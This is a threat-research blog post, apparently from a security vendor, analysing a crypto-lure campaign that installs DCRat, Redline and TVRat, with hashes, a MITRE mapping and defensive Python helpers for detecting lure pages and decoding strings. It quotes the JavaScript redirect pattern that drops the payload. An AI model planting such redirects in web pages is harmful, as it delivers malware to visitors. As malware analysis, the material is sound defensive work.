FreeCryptoScam - A New Cryptocurrency Scam That Leads to Installation of Backdoors and Stealers

Introduction

In January 2022, the ThreatLabz research team identified a crypto scam, which we’ve dubbed “FreeCryptoScam.” In this scam, the threat actor targets crypto users by luring them with an offer of free cryptocurrency. When the victim downloads the payload, it leads to installation of multiple malware payloads on the victim’s system, allowing the threat actor to establish backdoors and/or steal user information. In this campaign, we see the Dark Crystal RAT (“DCRat”) being downloaded which further leads to Redline and TVRat being downloaded and executed onto the victim’s system.

This blog aims to explain various aspects of the campaign that the ThreatLabz team has uncovered during the investigation and technical analysis of the dropped payloads.

Website Analysis

In this campaign, threat actors host their malicious payload on either a newly registered domain (Figure 1) or an old, compromised web domain (Figure 2 & Figure 3). They use the following mechanisms to drop the payload onto the victim machine:

As soon as the user visits the website, the following JavaScript inside a “script” tag executes and drops the payload:
“setTimeout(document.location.href=<link of the payload>, <milliseconds>)”
As soon as the user clicks the button, its “href” property, which holds the payload link, is used to drop the payload.
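A defender-side check for the two drop mechanisms just described, written for this post as an added example (not ThreatLabz code): it pulls inline script bodies and anchor targets out of a page and flags a setTimeout redirect or a link that points straight at an executable. The HTML and hostname below are constructed placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed lure page modelled on the two mechanisms described above;
# the host is a placeholder, not a real indicator.
SAMPLE_HTML = """<html><body>
<h1>Claim your FREE crypto!</h1>
<script>setTimeout(document.location.href="https://lure.example.invalid/FreeCrypto.exe", 3000)</script>
<a href="https://lure.example.invalid/FreeCrypto.exe">Download</a>
<a href="/about.html">About</a>
</body></html>"""

# Script that assigns location(.href) inside a setTimeout call; captures the target URL
AUTO_NAV = re.compile(r"""setTimeout\s*\(\s*(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""", re.I)
# Targets whose path ends in an executable-type extension (query/fragment allowed)
EXE_EXT = re.compile(r"\.(exe|scr|msi|bat|js|vbs)(\?[^#]*)?(#.*)?$", re.I)

class LureScanner(HTMLParser):
    """Collects inline <script> bodies and <a href> targets from a page."""
    def __init__(self):
        super().__init__()
        self.scripts, self.hrefs, self._buf, self._in_script = [], [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)
    def handle_endtag(self, tag):
        if tag == "script":
            self.scripts.append("".join(self._buf))  # script text may arrive in chunks
            self._buf, self._in_script = [], False
    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

def find_drops(html):
    """Return (mechanism, url) for each auto-redirect or direct link to an executable."""
    p = LureScanner()
    p.feed(html)
    p.close()
    hits = [("auto_redirect", u) for s in p.scripts for u in AUTO_NAV.findall(s) if EXE_EXT.search(u)]
    hits += [("click_link", u) for u in p.hrefs if EXE_EXT.search(u)]
    return hits
```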

Figure 1: Newly spun up website hosting malicious payloads

Figure 2: Old compromised websites used for hosting malicious payload

It should be noted that:

The threat actor uses social engineering to drive successful payload execution, luring victims to install the dropped payload by using a message offering free cryptocurrency. 
The attack works across browsers, with the mechanism running the same way in Chrome, Internet Explorer, and Firefox. Depending on the browser settings, the payload will be automatically downloaded, or a pop-up window will ask the user to save the application on the system.
From the whois record, it is clear that the second domain (shown in Figure 2) is an old domain that has likely been compromised.

Figure 3: Whois report of the second domain [Credit: DomainTools]

Attack Chain

The figure below depicts the attack chain of two scenarios:

Figure 4: Attack chain

Technical Analysis

As shown in the above figure, we found two types of payload:

In Scenario 1, the payload was a downloader that connected to another malicious domain hosting second stage payloads—backdoors and stealers. In most cases, the downloaded files were DCRat, Redline, and TVRat.
In Scenario 2, the payload served the DCRat malware directly. 

[+] Scenario 1: Downloader DCRatLoader

For the purposes of analysis, we will look at the payload with MD5 hash D3EF4EC10EE42994B313428D13B1B0BD, which is protected by the well-known packer ASProtect and carries a fake certificate (as shown in the figure below).

Figure 5: Version information and digital certificate

After unpacking the file, we get a 48KB .NET executable (MD5 = 469240D5A3B57C61F5F9F2B90F405999). This is a downloader containing base64-encoded URLs and file paths (as shown in the figure below).

Figure 6: Code of Unpacked file

These base64 encoded strings represent the URL paths for downloading stage 2 payloads as well as the file paths where these payloads will be dropped on the victim system.
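An added triage helper (not from the original analysis) for the string table described above: it finds base64 runs in a byte blob, decodes them, and keeps only those that turn into a URL or a Windows path. The blob is constructed with placeholder values; on a real unpacked .NET sample the user strings live as UTF-16 in the #US stream, so run this over strings already extracted by a decompiler or a UTF-16-aware strings dump rather than over the raw file.

```python
import base64
import re

# Runs of base64 alphabet long enough to hold a URL or path (16+ chars, optional padding)
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
# Decoded text must look like an http(s) URL, a drive-rooted path or an %ENV%-rooted path
URL_OR_PATH = re.compile(r"^(https?://\S+|[A-Za-z]:\\[^\x00-\x1f]+|%[A-Za-z]+%\\[^\x00-\x1f]+)$")

# Constructed stand-in for the unpacked downloader's string table: a stage-2 URL and
# a drop path, base64-encoded, among filler bytes. Placeholder host, not a real indicator.
SAMPLE_BLOB = (
    b"MZ\x90\x00"
    + base64.b64encode(b"http://stage2.example.invalid/files/dcrat.exe")
    + b"\x00\x00"
    + base64.b64encode(b"C:\\Users\\Public\\svchost.exe")
    + b"\x00garbage_not_base64\x00AAAAAAAAAAAAAAAAAAAA\x00"
)

def decode_embedded_b64(blob):
    """Return (encoded, decoded) pairs for base64 runs that decode to a URL or Windows path."""
    hits = []
    for m in B64_RUN.finditer(blob):
        token = m.group(0)
        pad = (-len(token)) % 4
        if pad == 3:  # length == 1 (mod 4) can never be valid base64
            continue
        try:
            text = base64.b64decode(token + b"=" * pad, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        # Drops runs that decode to binary noise (e.g. long runs of 'A' -> NUL bytes)
        if text.isprintable() and URL_OR_PATH.match(text):
            hits.append((token.decode("ascii"), text))
    return hits

if __name__ == "__main__":
    for enc, dec in decode_embedded_b64(SAMPLE_BLOB):
        print(f"{enc[:24]}... -> {dec}")
```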

Figure 7: URLs and File paths

[+] Scenario 2: DCRat

The second scenario involved direct download of the DCRat payload, which was also protected by ASProtect. Upon unpacking, we get a 664KB .NET executable (MD5 = 37F433E1843602B29EC641B406D14AFA), which is the DCRat malware (shown in the figure below).

Figure 8: Strings found in memory

Network Traffic:

Figure 9: Network traffic observed

Figure 10: Get request sent to C&C

In addition to the DCRat code, we also found stealer code inside the unpacked binary. This code exhibits typical stealer characteristics and is used to exfiltrate sensitive user information. Besides stealing information from the infected system, it also disables antivirus protection if it finds it enabled. The code in the figure below shows the type of data being exfiltrated:

Figure 11: Stealer code

Figure 12: Checks for installed antivirus products and disables them

We saw the sample create a mutex named “\Sessions\1\BaseNamedObjects\865218dd0bef38bd584e8c4ea44a4b7e295cb6f3”, where 865218dd0bef38bd584e8c4ea44a4b7e295cb6f3 is the SHA-1 hash of the string “DCR_MUTEX-BZrxW3QvqgtvhEFCpLSr”; the “DCR_MUTEX” prefix is characteristic of DCRat.
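To turn the naming relation above into a reusable check (added example, not part of the original post): compute SHA-1 over candidate DCR_MUTEX seed strings and match the digests against mutex names collected from a sandbox run. The seed and mutex values are the ones quoted in this analysis; the second case in the self-check uses a constructed seed.

```python
import hashlib
import re

# Mutex observed in the sample and the seed string the analysis says it hashes
OBSERVED_MUTEX = r"\Sessions\1\BaseNamedObjects\865218dd0bef38bd584e8c4ea44a4b7e295cb6f3"
DCRAT_MUTEX_SEED = "DCR_MUTEX-BZrxW3QvqgtvhEFCpLSr"

# Session-scoped BaseNamedObjects mutex whose leaf name is a 40-hex-char SHA-1
BNO_SHA1 = re.compile(r"^\\Sessions\\\d+\\BaseNamedObjects\\([0-9a-f]{40})$", re.I)

def sha1_hex(s):
    """SHA-1 of a UTF-8 string as lowercase hex."""
    return hashlib.sha1(s.encode("utf-8")).hexdigest()

def match_mutexes(observed_mutexes, candidate_seeds):
    """Map each SHA-1-style mutex name to the seed string that produces it, if any."""
    table = {sha1_hex(seed): seed for seed in candidate_seeds}
    out = {}
    for name in observed_mutexes:
        m = BNO_SHA1.match(name)
        if m and m.group(1).lower() in table:
            out[name] = table[m.group(1).lower()]
    return out

if __name__ == "__main__":
    # Reproduces the relation stated above: SHA-1(seed) should equal the mutex leaf name
    print(sha1_hex(DCRAT_MUTEX_SEED))
    print(match_mutexes([OBSERVED_MUTEX], [DCRAT_MUTEX_SEED]))
```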

Figure 13: Configuration of the DCRat

Zscaler Sandbox Detection

Zscaler Cloud Sandbox report: Downloader payload

Zscaler Cloud Sandbox report: DCRat payload

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to the campaign at various levels with the following threat names:

Win32.Downloader.DCRat
Win32.Downloader.Redline
Win32.Downloader.TVrat
Win32.Backdoor.Dcrat
Win32.Backdoor.Redline
Win32.Backdoor.Tvrat

We haven’t categorized this campaign in association with any particular family because it’s a generic downloader that downloads other backdoors or stealers.

MITRE ATT&CK and TTP Mapping

ID    | Technique                                   | Description
T1189 | Drive-by Compromise                         | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing.
T1140 | Deobfuscate/Decode Files or Information     | Strings and other data are obfuscated in the payload.
T1082 | System Information Discovery                | Sends processor architecture and computer name.
T1083 | File and Directory Discovery                | Uploads files from the victim machine.
T1005 | Data from Local System                      | Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration.
T1222 | File and Directory Permissions Modification | Changes directory permissions to hide its file.
T1555 | Credentials from Password Stores            | Steals stored passwords.
T1056 | Keylogging                                  | Keylogs the infected machine.
T1055 | Process Injection                           | Injects code into other processes.

Indicators of Compromise

[+] MD5 Hashes


[+] Network Indicators:

